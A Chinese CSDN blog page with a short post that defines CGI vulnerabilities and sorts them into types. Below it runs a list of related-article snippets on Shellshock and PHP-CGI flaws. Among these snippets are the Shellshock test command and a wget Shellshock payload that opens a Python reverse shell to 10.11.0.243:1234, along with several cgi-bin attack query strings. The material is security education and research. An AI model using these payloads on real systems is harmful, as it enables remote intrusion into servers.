什么是cgi漏洞

最新推荐文章于 2024-06-24 20:03:13 发布
最新推荐文章于 2024-06-24 20:03:13 发布
阅读量5.2k 收藏 5
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Praifire/article/details/78549491
版权 
CGI是Common Gateway Inerface(公用网关接口)的简称,并不特指一种语言。Web服务器的安全问题主要包括:1)Web服务器软件编制中的BUG;2)服务器配置的错误。可能导致CGI源代码泄漏,物理路径信息泄漏,系统敏感信息泄漏或远程执行任意命令。CGI语言漏洞分为以下几类:配置错误、边界条件错误、访问验证错误、来源验证错误、输入验证错误、策略错误、使用错误等等。CGI漏洞大多分为一下几种类型:暴露不该暴露的信息、执行不该执行的命令、溢出。
Praifire
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
企业微信cgi-bin/gateway/agentinfo接口存在未授权访问漏洞 附POC
nnn2188185的博客
08-30 911
微信公众号搜索:南风漏洞复现文库该文章 南风漏洞复现文库 公众号首发企业微信是腾讯微信团队为企业打造的专业办公管理工具。与微信一致的沟通体验,丰富免费的OA应用,并与微信消息、小程序、微信支付等互通,助力企业高效办公和管理。
CVE-2014-6271“破壳”漏洞利用过程
D-river博客
11-12 9108
前言CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。实验环境攻击机:kali linux 目标机: Ubuntu ip: 10.10.10.129漏洞验证 Bash版本小于等于4.3可能存在漏洞
WEB漏洞概述
东方一华
03-27 1217
物理路径泄露:物理路径泄露一般是由于WEB服务器处理用户请求出错导致的,如通过提交一个超长的请求,或者是某个精心构造的特殊请求,亦或是请求一个WEB服务器上不存在的文件。这些请求都有一个共同特点,那就是被请求的文件肯定属于CGI脚本,而不是静态HTML页面。还有一种情况,就是WEB服务器的某些显示环境变量的程序错误的输出了WEB服务器的物理路径,这应该算是设计上的问题。  CGI源代码泄露
Cgi-bin 30个漏洞+使用方法.txt
07-18
Cgi-bin 30个漏洞+使用方法
漏洞复现」PHP-CGI Windows平台远程代码执行漏洞(CVE-2024-4577)
qq_39894062的博客
06-11 833
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!
hacksudo靶机之(cgi-bin)破壳漏洞弹shell、GTFOBins提权、SQL注入
qq_40898302的博客
05-18 812
目标:取得 root 权限 + Flag。当前用户执行thor权限用户的脚本。用nmap去探测是否存在破壳漏洞。强制爆破cgi和sh结尾的文件。利用curl 定义函数执行命令。bash在解析的时候存在漏洞。登录thor并升级shell。用service提权root。查看thor的sudo权限。老版本的bash可以执行。
[cgi-bin] 30个漏洞+使用方法
weixin_33782386的博客
04-03 1766
/smspass.plusername=username&password=password/index.cgiwei=ren&gen=command/passmaster.cgiAction=Add&Username=Username&Password=Password/accountcreate.cgiusername=username&password...
最新702种CGI漏洞
05-04
CGI漏洞的利用(一) GI漏洞向来是容易被人们忽视的问题,同时也是普遍存在的 一、phf.cgi攻击: phf是大家所熟悉的了,它本来是用来更新PHONEBOOK的,但是许多管理员对它不了解以至于造成了漏洞
PHP-CGI远程代码执行漏洞分析与防范
12-20
【PHP-CGI远程代码执行漏洞分析与防范】 PHP-CGI远程代码执行漏洞是针对PHP运行模式中的CGI接口的一种安全缺陷,可能导致攻击者能够在服务器上执行任意代码,从而获取服务器控制权。该漏洞主要出现在PHP的CGI sapi...
一次成功的cgi漏洞入侵
04-19
网站安全包括许多方面,尽管网管们千方百计的防范于未然,可有时...我的“再谈cgi漏洞攻击”一文中,我利用cgi漏洞攻进几台服务器,这次我将以一次,从发现漏洞到利用漏洞, 从而攻进主机的全过程来讲解,与大家交流。
webcgi-exploits:多语言Web CGI界面漏洞利用
05-13
Web CGI漏洞利用 这是与不同的Web CGI相关的几种漏洞利用。 我在过去几年中写过这些漏洞。 这个怎么运作 Web应用程序基本上就是这些层: 应用领域 网络框架 脚本语言引擎 Web容器(服务器) 网络前端代理(nginx...
检测cgi-bin漏洞存在方法
热门推荐
xiaoshan812613234的专栏
12-25 2万+
bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulnerable' bash -c "echo this is a test", 如果在一个含有版本号小于bash 4.3的linux或者unix系统上执行以上命令,可能会得到以下输出: v
CGI漏洞速查一
|独自望海。。。
09-28 1354
1.wguset.exe   描述: 如果您使用NT做为您的WebServer的操作系统,而且 “wguest.exe”存在于您的Web可执行目录中的话,入侵者将能利用 它阅读到您的硬盘上所有USR_用户能阅读的文件。 建议: 将wguset.exe从你的We
CGI漏洞速查二
|独自望海。。。
09-28 2080
 php.cgi程序有较多的漏洞,包括缓存溢出漏洞,还有导致任 何系统文件可以被入侵者读取的漏洞 建议: 建议审核cgi-bin目录,避免有不必要的程序存在。解决方法: 删除php.cgi程序是最好的办法。 12.handler 描述: IRIX 5.3, 6.2, 6.3, 6.4的/cgi-bin/handler程序存在缓存 溢出错误,允许入侵者在server上远程执行一段程序
PHP-CGI漏洞(CVE-2024-4577)
最新发布
qq_64395221的博客
06-24 1141
通过前两篇文章的铺垫,现在我们可以了解 CVE-2024-4577这个漏洞的原理CVE-2024-4577是CVE-2012-1823这个老漏洞的绕过,php cgi的老漏洞至今已经12年,具体可以参考我的另一个文档简单来说,就是使用cgi模式运行的PHP,根据RFC3875的规定,Apache会将请求的QUERY_STRING作为命令行参数交给php-cgi执行。攻击者利用这个特性,就可以-d选项修改PHP的配置项,最后执行任意代码。
渗透测试网络攻防-apache cgi漏洞利用
网络安全领域优质创作者
11-05 2447
cgi-bin扫描路径暴露出:/cgi-bin/ wget-qO- -U "() { test;};echo \"Content-type: text/plain\"; echo; echo; /usr/bin/python -c 'importsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.11.0.243\",1234));os.dup2(s.fileno(),0);...
关于 CGI 的安全性
风之子的专栏
08-02 3981
关于 CGI 的安全性
漏洞利用六:Linux系统漏洞利用
ZY95001的博客
09-04 4649
一、 二、
CGI漏洞攻击手册
蓝法典的专栏
03-20 8979
在论坛里看到过bamboo写的CGI漏洞利用的文章,我就想把他扩大一些.一直想完善一些再贴上来,但我并没有机会和时间试过所有漏洞,想到论坛里还有那么多同志会来完善的,就取名CGI漏洞攻击手册version-0.02(升级了bamboo的),旨在抛砖引玉,欢迎任意修改,增加...更欢迎任意散播.:)一. phf漏洞这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/e
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值